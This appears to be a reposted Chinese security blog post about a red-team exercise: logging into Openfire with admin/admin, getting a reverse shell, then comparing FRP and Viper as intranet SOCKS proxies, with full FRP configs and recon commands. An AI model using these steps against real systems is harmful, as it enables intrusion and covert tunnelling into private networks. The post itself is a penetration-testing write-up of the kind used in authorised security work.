免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
本文重点不在于渗透,而在于FRP和Viper代理效果对比。
1►
Getshell
攻防演练中遇到的场景,开局一个Openfire,于是马上找历史洞看能不能Getshell。
弱口令admin/admin,进入后台
找到服务器-服务器设置-用户接口设置
发现可上传文件、也可执行命令
VPS开启监听
bash反弹
Getshell成功
2►
2种内网代理搭建
FRP
FRP服务端
frps.ini--------------------------------------[common]#服务端监听端口,默认7000。监听来自客户端的流量请求bind_port = 7000--------------------------------------启动chmod +777 frps./frps -c ./frps.ini
FRP客户端
frpc.ini---------------------[common]server_addr = X.X.0.107server_port = 7000[plugin_socks]type = tcpremote_port = 7777plugin = socks5----------------------启动chmod +777 frpcnohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &
代理搭建成功
Viper
Viper新建监听
生成木马
上传服务器执行,上线成功
内网代理-添加内网路由
新增代理
代理搭建成功
3►
代理对比
FRP
速度遥遥领先
Viper
直接加载不出来
对比之下,使用Viper上线Linux主机再搭代理好像操作繁琐并不好用。
4►
内网渗透
查找内网段
ifconfig && netstat -ano && arp -a
找到网段然后Fscan一把梭即可
Redis
DEM
等等就不一一截图了。内网渗透就常规方法。
5►
总结
内网渗透时出口是Linux主机的话,如果能执行命令直接上FRP代理即可,没有太大必要使用CS或者Viper上线Linux主机。代理对比FRP好于Viper内网代理。
6►
原文始发于微信公众号(李白你好):Linux下内网渗透FRP代理和Viper代理对比
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论